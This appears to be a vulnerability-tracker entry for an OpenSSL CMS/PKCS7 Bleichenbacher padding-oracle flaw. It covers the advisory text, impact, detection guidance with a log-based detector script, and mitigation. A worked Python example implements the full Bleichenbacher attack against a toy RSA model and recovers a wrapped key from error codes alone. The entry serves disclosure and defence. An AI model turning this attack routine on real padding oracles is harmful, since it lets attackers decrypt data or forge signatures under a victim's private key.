CVE-2026-42768
Awaiting Analysis - Queue
Bleichenbacher Oracle in OpenSSL CMS Decryption

Publication date: 2026-06-09

Last updated on: 2026-06-09

Assigner: OpenSSL Software Foundation

Description
Issue summary: The CMS_decrypt() and PKCS7_decrypt() functions are vulnerable to a Bleichenbacher-style attack when an attacker can supply the CMS or S/MIME messages and observe the resulting error code and/or decryption output.

Impact summary: A Bleichenbacher-style attack lets the attacker use the victim's vulnerable application to decrypt or sign messages with the victim's private RSA key.

The attack is possible in two variants.

1. The decryption API (CMS_decrypt(), PKCS7_decrypt()) is called without a recipient certificate. In this case OpenSSL iterates over every KeyTransRecipientInfo (KTRI) without stopping at the first success. An attacker who authors a message with two KTRI entries, the first wrapping a real content-encryption key (CEK) under the victim's public key and the second carrying an arbitrary probe ciphertext, can vary the second KTRI adaptively and, if the application's error code is observable, learn whether the probe unwrapped to valid PKCS#1 v1.5 padding. That is a Bleichenbacher oracle (Bleichenbacher, CRYPTO '98): an adaptive chosen-ciphertext side channel from which the attacker can decrypt any RSA ciphertext encrypted to the victim's key or forge any PKCS#1 v1.5 signature under it.

2. The decryption API is called with the recipient certificate, but the recipient is not found and a random key is substituted. An attacker who authors a message and can compare both the error code and the result of the decryption can mount a Bleichenbacher oracle.

We are not aware of any applications that provide a remote attacker an opportunity to mount an attack described in these scenarios. We consider the existence of such an application very unlikely, and for this reason this CVE has been evaluated as Low severity.

To avoid these attacks, when RSA PKCS#1 v1.5 key transport is in use, the EVP_PKEY_decrypt() call now uses the implicit rejection mechanism described in draft-irtf-cfrg-rsa-guidance. In previous OpenSSL releases implicit rejection was explicitly disabled for this path. Implicit rejection always returns a plaintext value (the symmetric key); when the padding is invalid, that value is a deterministic function of the ciphertext and the private key, so the error code no longer distinguishes valid from invalid padding.

Two consequences follow. The length of the synthetic decryption result can happen to match the key length of the symmetric cipher used for content encryption, and when no certificate is provided the last RecipientInfo producing a plausible key is the one used, so decryption may yield garbage content rather than an error. The proper way to handle this is to provide the recipient certificate so that one particular RecipientInfo is selected for decryption.

The FIPS modules in 4.0, 3.6, 3.5 and 3.4 are not affected by this issue, as CMS and S/MIME processing happens outside the OpenSSL FIPS module boundary.
Meta Information
Generated: 2026-06-10
EPSS Evaluated: N/A
Affected Vendors & Products
Vendor: openssl
Product: openssl
Version / Range: up to 4.0 (excluding 4.0)

The range above is the tracker's CPE entry. The description itself names the 4.0 branch alongside 3.6, 3.5 and 3.4 when stating that only the FIPS module is unaffected, so treat the non-FIPS 4.0 build as in scope until the fixed-version list in the OpenSSL advisory has been checked.
CWE
CWE-514 (Covert Channel): A covert channel is a path that can be used to transfer information in a way not intended by the system's designers.
Compliance Impact

The vulnerability described in CVE-2026-42768 allows an attacker to decrypt or sign messages using the victim's private RSA key through a Bleichenbacher-style attack on the CMS_decrypt and PKCS7_decrypt functions.

This could potentially lead to unauthorized access to sensitive encrypted data or the forging of signatures, which may impact the confidentiality and integrity of data protected under regulations such as GDPR and HIPAA.

However, the CVE notes that no known applications currently provide a remote attacker the opportunity to mount this attack, and the issue is rated as Low severity.

Additionally, the FIPS modules in OpenSSL versions 4.0, 3.6, 3.5, and 3.4 are not affected, as CMS and S/MIME processing occurs outside the FIPS module boundary.

Therefore, while the vulnerability could theoretically affect compliance by exposing sensitive encrypted data or allowing signature forgery, the practical risk is considered low due to the unlikely attack scenarios and mitigations.

Executive Summary

The vulnerability involves the CMS_decrypt and PKCS7_decrypt functions being susceptible to a Bleichenbacher-style attack. This attack allows an attacker who can provide CMS or S/MIME messages and observe error codes or decryption outputs to decrypt or sign messages using the victim's private RSA key.

There are two variants of the attack. In the first, the decryption API is called without a recipient certificate, so OpenSSL tries every KeyTransRecipientInfo entry; an attacker places a probe ciphertext in a second entry and uses the application's error code to learn whether it unwrapped to valid PKCS#1 v1.5 padding. In the second, the API is called with a recipient certificate but the recipient is not found, so a random key is substituted; this can be exploited if both the error code and the decryption result are observable.

This attack exploits an adaptive-chosen-ciphertext side channel known as a Bleichenbacher oracle, enabling decryption of any RSA ciphertext or forging of PKCS#1 v1.5 signatures under the victim's key.

The issue is considered low severity because no known applications provide remote attackers the opportunity to mount this attack.

Impact Analysis

If exploited, this vulnerability allows an attacker to decrypt messages or forge signatures using the victim's private RSA key by leveraging the vulnerable decryption functions.

This could lead to unauthorized access to encrypted information or the ability to impersonate the victim by signing messages.

However, the likelihood of such an attack is considered very low due to the rarity of applications exposing the necessary conditions for the attack.

Detection Guidance

This vulnerability involves the CMS_decrypt() and PKCS7_decrypt() functions being vulnerable to a Bleichenbacher-style attack when an attacker can provide CMS or S/MIME messages and observe error codes or decryption output.

Detection therefore means watching how the application handles inbound CMS or S/MIME messages rather than looking for one bad message. A Bleichenbacher attack is adaptive and needs a large number of chosen ciphertexts against the same key (on the order of tens of thousands to around a million decryption attempts), so the observable signal is a burst of messages from one source that repeatedly fail recipient-key unwrap or content decryption, especially messages carrying more than one KeyTransRecipientInfo entry for a recipient. On the code side, audit for CMS_decrypt() or PKCS7_decrypt() calls made without a recipient certificate and for error codes or decrypted output that are returned to the message sender.

The provided context does not include specific commands or tools for detecting this vulnerability on a network or system.
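As an added example, not from the advisory or this tracker, the Python script below runs that volume heuristic over a few constructed log lines. The log format, field names (sender, ktri, result), sliding window and threshold are this example's own, and the threshold is set far below real attack volumes so the sample stays short; adapt all of them to what the application actually emits.

```python
# Added example: per-sender failure-rate detector over constructed log lines.
# Format, field names and threshold are this example's own, not OpenSSL's.
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample, one line per CMS/S-MIME decrypt attempt. A Bleichenbacher
# attack needs thousands of adaptively chosen messages, so the signal is the
# failure rate per sender, not any single error.
SAMPLE_LOG = """\
2026-06-09T10:00:00Z cms_decrypt sender=alice@example.org ktri=1 result=OK
2026-06-09T10:00:07Z cms_decrypt sender=probe@example.net ktri=2 result=ERR_UNWRAP
2026-06-09T10:00:08Z cms_decrypt sender=probe@example.net ktri=2 result=ERR_UNWRAP
2026-06-09T10:00:09Z cms_decrypt sender=bob@example.org ktri=1 result=ERR_UNWRAP
2026-06-09T10:00:10Z cms_decrypt sender=probe@example.net ktri=2 result=ERR_UNWRAP
2026-06-09T10:00:11Z cms_decrypt sender=probe@example.net ktri=2 result=ERR_CONTENT
2026-06-09T10:00:12Z cms_decrypt sender=probe@example.net ktri=2 result=ERR_UNWRAP
2026-06-09T10:05:00Z cms_decrypt sender=alice@example.org ktri=1 result=OK
"""

def parse(line: str) -> dict:
    # "<ts> <event> k=v k=v ..." -> dict with a datetime and an int KTRI count
    ts, _event, *kv = line.split()
    rec = dict(p.split("=", 1) for p in kv)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    rec["ktri"] = int(rec["ktri"])
    return rec

def detect(log: str, window_s: int = 60, threshold: int = 5) -> list:
    # One alert per sender once `threshold` suspicious results fall inside a
    # sliding window. A failed unwrap is always suspicious; a content failure
    # counts only on multi-recipient messages, which is the shape variant 1 of
    # the advisory requires (a conforming probe passes unwrap but still fails
    # content decryption).
    recent = defaultdict(deque)          # sender -> timestamps of suspicious results
    alerted, alerts = set(), []
    for line in log.splitlines():
        rec = parse(line)
        suspicious = rec["result"] == "ERR_UNWRAP" or (rec["result"] != "OK" and rec["ktri"] > 1)
        if not suspicious:
            continue
        q = recent[rec["sender"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold and rec["sender"] not in alerted:
            alerted.add(rec["sender"])
            alerts.append(f"{rec['ts'].isoformat()}Z possible padding-oracle probing from "
                          f"{rec['sender']}: {len(q)} failed decrypts in {window_s}s")
    return alerts
```

On the sample, only probe@example.net crosses the threshold; bob's single failed unwrap and alice's successes do not. In production the threshold belongs in the thousands, and the sender field should be whatever the transport actually authenticates (SMTP envelope sender, peer IP, API client) rather than a header the attacker controls.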

Mitigation Strategies

To mitigate this vulnerability, invoke the decryption API (CMS_decrypt(), PKCS7_decrypt()) with the recipient certificate so that a single RecipientInfo is selected for decryption.

Providing the certificate removes the iteration over every KeyTransRecipientInfo entry that variant 1 depends on, and it avoids the garbage-content case in which the last plausible key wins. It does not by itself close variant 2, which the implicit rejection fix addresses.

Update to an OpenSSL release in which CMS/PKCS7 RSA PKCS#1 v1.5 key transport uses the implicit rejection mechanism described in draft-irtf-cfrg-rsa-guidance: on invalid padding EVP_PKEY_decrypt() returns a deterministic synthetic key instead of an error, so the padding check no longer leaks through the error code. Independently of the library version, do not return decryption error codes or decrypted output to untrusted message senders, since the attack requires observing them.

Note that FIPS modules in OpenSSL versions 4.0, 3.6, 3.5, and 3.4 are not affected by this issue.
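The two-KTRI oracle of variant 1 and the implicit rejection fix, worked through as an added Python example that is not OpenSSL code and is not taken from the advisory (it serves both the Description above and this section). It models RSA key transport with a deliberately tiny key built from two Mersenne primes (constructed and not secure), stands in for the content cipher with an HMAC tag, and reduces CMS recipient handling to a list of wrapped keys; every name in it (wrap_key, unwrap_explicit, unwrap_implicit, app_decrypt, bleichenbacher, recover_cek_explicit, implicit_outcomes) is the example's own. Two simplifications are deliberate: the oracle is taken at the PKCS#1 v1.5 padding level, whereas real CMS processing additionally checks the unwrapped key's length (which lowers the oracle's hit rate but not the principle), and the implicit rejection stand-in derives the synthetic key with an HMAC keyed from the private key and fixes its length to the expected key size, whereas the draft also randomises the synthetic length and performs the selection in constant time.

```python
# Added example, not OpenSSL code. Toy RSA from two Mersenne primes (constructed,
# NOT secure); an HMAC tag stands in for the content cipher, a list for the KTRIs.
import functools
import hashlib
import hmac
import os

P, Q = (1 << 107) - 1, (1 << 127) - 1            # Mersenne primes M107, M127
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))
DP, DQ, QINV = D % (P - 1), D % (Q - 1), pow(Q, -1, P)
K = (N.bit_length() + 7) // 8                     # modulus length in bytes (30)
B = 1 << (8 * (K - 2))                            # 2B <= m < 3B  <=>  m starts with 00 02
CEK_LEN = 16                                      # AES-128 content-encryption key
CONTENT = b"constructed message body"
KDK = hashlib.sha256(D.to_bytes(K, "big")).digest()   # per-private-key secret (simplified)
cdiv = lambda a, b: -(-a // b)
content_tag = lambda cek: hmac.new(cek, CONTENT, hashlib.sha256).digest()

def rsa_private(c: int) -> int:
    # c^d mod N via CRT; same value as pow(c, D, N), several times faster.
    m1, m2 = pow(c % P, DP, P), pow(c % Q, DQ, Q)
    return m2 + ((QINV * (m1 - m2)) % P) * Q

def wrap_key(key: bytes) -> bytes:
    # EME-PKCS1-v1_5: 00 02 <at least 8 non-zero bytes> 00 <key>, then RSA.
    ps = bytes(b % 255 + 1 for b in os.urandom(K - 3 - len(key)))
    em = b"\x00\x02" + ps + b"\x00" + key
    return pow(int.from_bytes(em, "big"), E, N).to_bytes(K, "big")

def pkcs1_v15_unpad(em: bytes):
    # Payload, or None when the padding is invalid: this check is what leaks.
    sep = em.find(b"\x00", 2)
    return None if em[:2] != b"\x00\x02" or sep < 10 else em[sep + 1:]

@functools.lru_cache(maxsize=None)        # the genuine KTRI is unwrapped once, not per probe
def unwrap_explicit(ct: bytes):
    # Pre-fix behaviour: invalid padding surfaces as an error (None).
    return pkcs1_v15_unpad(rsa_private(int.from_bytes(ct, "big")).to_bytes(K, "big"))

def unwrap_implicit(ct: bytes) -> bytes:
    # Post-fix behaviour: never fails. Bad padding or a wrong-length key yields a
    # synthetic key that is a deterministic function of (ciphertext, private key).
    payload = unwrap_explicit(ct)
    synthetic = hmac.new(KDK, ct, hashlib.sha256).digest()[:CEK_LEN]
    return payload if payload is not None and len(pay1oad := payload) == CEK_LEN else synthetic

def app_decrypt(ktris, tag: bytes, unwrap) -> str:
    # Variant 1: no recipient certificate, every KTRI is unwrapped, last plausible key wins.
    cek = None
    for ct in ktris:
        key = unwrap(ct)
        if key is None:
            return "ERR_UNWRAP"                   # the oracle bit
        if len(key) == CEK_LEN:
            cek = key
    return "OK" if cek and hmac.compare_digest(content_tag(cek), tag) else "ERR_CONTENT"

def bleichenbacher(conforming, c0: int) -> int:
    # Bleichenbacher (CRYPTO '98) steps 2a/2b/2c/3/4; c0 is known conforming, so step 1 is skipped.
    ok = lambda s: conforming((c0 * pow(s, E, N)) % N)
    M, s = [(2 * B, 3 * B - 1)], cdiv(N, 3 * B)
    while not ok(s):                                                    # 2a
        s += 1
    while True:
        new = []                                                        # 3
        for a, b in M:
            for r in range(cdiv(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo, hi = max(a, cdiv(2 * B + r * N, s)), min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = new                               # sub-intervals are pairwise disjoint, no merge needed
        if len(M) == 1 and M[0][0] == M[0][1]:                          # 4
            return M[0][0]
        if len(M) > 1:                                                  # 2b
            s += 1
            while not ok(s):
                s += 1
            continue
        a, b = M[0]                                                     # 2c
        r = cdiv(2 * (b * s - 2 * B), N)
        while True:
            t = next((t for t in range(cdiv(2 * B + r * N, b), (3 * B - 1 + r * N) // a + 1) if ok(t)), None)
            if t is not None:
                s = t
                break
            r += 1

def recover_cek_explicit(cek: bytes) -> bytes:
    # Attacker's message: genuine KTRI first, probe second; only the error code is seen.
    real, tag = wrap_key(cek), content_tag(cek)
    oracle = lambda c: app_decrypt([real, c.to_bytes(K, "big")], tag, unwrap_explicit) != "ERR_UNWRAP"
    return pkcs1_v15_unpad(bleichenbacher(oracle, int.from_bytes(real, "big")).to_bytes(K, "big"))

def implicit_outcomes(cek: bytes) -> set:
    # Same message shape against the fixed unwrap: every probe, conforming or not, looks the same.
    real, tag = wrap_key(cek), content_tag(cek)
    probes = [pow(i, E, N).to_bytes(K, "big") for i in range(2, 40)] + [wrap_key(os.urandom(CEK_LEN))]
    return {app_decrypt([real, p], tag, unwrap_implicit) for p in probes}
```

recover_cek_explicit() drives the vulnerable application with several tens of thousands of adaptively chosen probe KTRIs and recovers the genuine content-encryption key from nothing but the ERR_UNWRAP / not-ERR_UNWRAP distinction; on this key size it finishes in a few seconds. implicit_outcomes() sends the same shape of message to the fixed unwrap and gets one outcome for every probe: the unwrap never fails, the last plausible key (the probe's) is used, and content decryption fails identically whether or not the probe's padding was valid. That is the garbage-content behaviour the advisory describes, and the reason the recipient certificate should still be supplied.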
